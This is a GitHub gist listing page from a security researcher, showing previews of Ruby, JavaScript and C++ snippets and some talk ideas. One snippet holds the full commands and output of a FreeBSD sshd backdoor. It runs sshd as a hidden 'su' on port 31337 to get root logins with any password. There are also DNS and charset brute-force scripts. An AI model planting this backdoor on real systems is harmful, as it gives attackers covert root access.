Skip to content

Instantly share code, notes, and snippets.

View mubix's full-sized avatar
🎯
Focusing

Rob Fuller mubix

🎯
Focusing
3.2k followers · 430 following
View GitHub Profile
@mubix
mubix / follow_all.rb
Created January 2, 2014 21:46
Follow everyone script from @hdm - source: http://zerobin.net/?080e550f9200bb05#0uMlFoaUVA0bf7c/5t8C0aKwyZXawVlsvaEMfjwKC6M=
#!/usr/bin/env ruby
require 'rubygems'
require 'twitter'
cli = Twitter::REST::Client.new do |config|
config.consumer_key = "..."
config.consumer_secret = "..."
config.access_token = "..."
config.access_token_secret = "..."
end
@mubix
mubix / follow_all.rb
Created January 8, 2014 22:15
Follow All Revision 1
#!/usr/bin/env ruby
require 'rubygems'
require 'twitter'
# You can get the following by creating a "app" here: https://dev.twitter.com/apps
cli = Twitter::REST::Client.new do |config|
config.consumer_key = ""
config.consumer_secret = ""
config.access_token = ""
config.access_token_secret = ""
@mubix
mubix / useproxyresponse.rb
Created January 24, 2014 08:32
Attempting to use a 305 HTTP code
require 'sinatra'
# Notes:
# https://www.youtube.com/watch?v=H9Kxas65f7A @ 5 minutes 20 seconds
# http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.6
# http://www.askapache.com/htaccess/apache-status-code-headers-errordocument.html#305_Proxy
# http://www.checkupdown.com/status/E305.html
get '/' do
@mubix
mubix / possible_talks.md
Created January 31, 2014 03:29
Just some talk ideas...

Stop your friends and family from becoming bots

by Rob Fuller

When we talk about big topics like "The Internet of Things" and protecting it is not just a company or government's job, it's everyones. I grew up with Recycle, Reduce, Reuse. I'll share some ways we can all help friends and family from becoming bots and pawns in this new cyber world.

Call to action: Free, quick, reusable tips that everyone should be able to use to help slow the tide of malware infections and bot use on the Internet.

Crowd sourcing security

@mubix
mubix / kcope_ssh_backdoor.txt
Created February 5, 2014 20:37
Source: http://pastebin.com/2NgL8SDE
simplest sshd backdoor ever.
# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -a
FreeBSD BSDPWNED 9.0-RELEASE ...
BSDPWNED# mkdir /tmp/" "
BSDPWNED# ln -sf /usr/sbin/sshd /tmp/" "/su
BSDPWNED# /tmp/" "/su -oPort=31337
BSDPWNED# ssh -lroot -p31337 0
root@0's password: <any password>
@mubix
mubix / brutelist.rb
Created February 20, 2014 04:54
Just charset brute force script
#!/usr/bin/env ruby
#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#
def result?(sub)
puts sub
1 == 2
@mubix
mubix / brutedns.rb
Created February 20, 2014 04:55
Iteratively brutes dns hostnames
#!/usr/bin/env ruby
#
## Brute code stolen form: https://gist.github.com/petehamilton/4755855
#
@domain = 'contoso.com'
def result?(sub)
results = %x(dig +noall #{sub}.#{@domain} +answer)
@mubix
mubix / watir-screen.rb
Created May 2, 2014 03:58
Screenshotting w/ Selenium and Burp
#!/usr/bin/env ruby
require 'watir-webdriver'
def screenshot(url)
b = Watir::Browser.new
b.goto url
filename = url
if filename =~ /:\/\//
filename = filename.split('://')[1]
@mubix
mubix / browserloop.js
Created July 23, 2014 18:28
Fun with NodeJS
var http = require('http');
function parseSwitch(req){
var list = {},
rc = req.headers.cookie;
rc && rc.split(';').forEach(function( cookie ) {
var parts = cookie.split('=');
list[parts.shift().trim()] = unescape(parts.join('='));
});
return list;
@mubix
mubix / milkman.cpp
Last active May 7, 2017 19:42
Milkman
#ifndef UNICODE
#define UNICODE
#endif
#include <Windows.h>
#include <string.h>
#include <stdio.h>
#include <Psapi.h>